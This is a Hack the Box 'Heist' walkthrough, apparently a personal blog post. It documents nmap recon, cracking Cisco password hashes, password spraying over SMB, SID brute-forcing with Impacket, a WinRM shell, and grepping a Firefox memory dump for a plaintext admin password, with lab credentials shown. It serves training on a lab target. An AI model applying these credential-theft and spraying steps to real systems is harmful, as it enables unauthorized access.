Cookie Consent by PrivacyPolicies.com

Hack the Box - Heist

on under hack-the-box
5 minute read
htb, walkthrough, writeup, windows, winrm, smb, impacket

Introduction

Heist was an easy difficulty box that combined credential harvesting, spraying, dumping a process to capture further credentials and a final spray to get Administrator access. OVerall it was a good box Windows box with a few fundamentals that could be practiced.

Initial Recon

As usual, let's kick it off with an NMAP scan.

root@kali:~# nmap -sV -sV -p- 10.10.10.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-19 15:26 EDT
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.23 seconds

SMB did not reveal anything public so let's take a look at the web service running.

Looks like there is a guest login option. Let's pop in as guest and see what we can find.

Oooh, an attachment? Don't mind I do!

Ok excellent, we're starting our credentials list. Cracking the type-5 and type-7 cisco hashes we now have a list of:

hazard:stealth1agent
rout3r::0242114B0E143F015F5D1E161713::$uperP@ssword
admin::02375012182C1A1D751618034F36415408::Q4)sJu\Y8qz*A3?d

The first pairing of hazard/stealth1agent was a guess based on the username in the issues post. I dumped all potential passwords and usernames into corresponding files and used the smb_login module to spray them for validity.

User exploitation

Unfortunately at this point Hazard was not able to log in using winrm so took a different angle and tried dumping more information with the valid credentials.

root@kali:~/Desktop/HTB/Heist# python lookupsid2.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

Brute forcing SIDs at 10.10.10.149
Trying protocol 445/SMB...
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Great, we have a few more users to add to our user file. Let's re-run the smb_login module with the expanded list now.

We have an extra hit, excellent! This time chase was able to leverage winrm and we got ourselves a shell. I went between evil-winrm and the ruby iteration of winrm to try different angles.

And now with shell access we are able to get our user flag. User down!

Root exploitation

Unfortunately my notes were a little skimp during this part. Checking the login.php code we saw that there was an admin hash listed.

<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
        if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
                $_SESSION['admin'] = "valid";
                header('Location: issues.php');
        }
        else
                header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
        if( $_GET['guest'] === 'true' ) {
                $_SESSION['guest'] = "valid";
                header('Location: issues.php');
        }
}
?>

Also checking the todo file in Chase's home directory we can assume he is periodically logging in to check any ongoing issues.

PS > cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

Armed with this information let's dump the browser's (firefox) process and look any stored passwords in memory. Getting the dump file over to our own host we do a quick check.

root@kali:~/Desktop/HTB/Heist# strings firefox.exe_191020_085813.dmp | egrep 'password'
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Perfect! Now let's expand our smb_logon files to validate the password.

Bam! Let's use our trusty evil-winrm to log on.

There we go! Thanks everyone, until next time!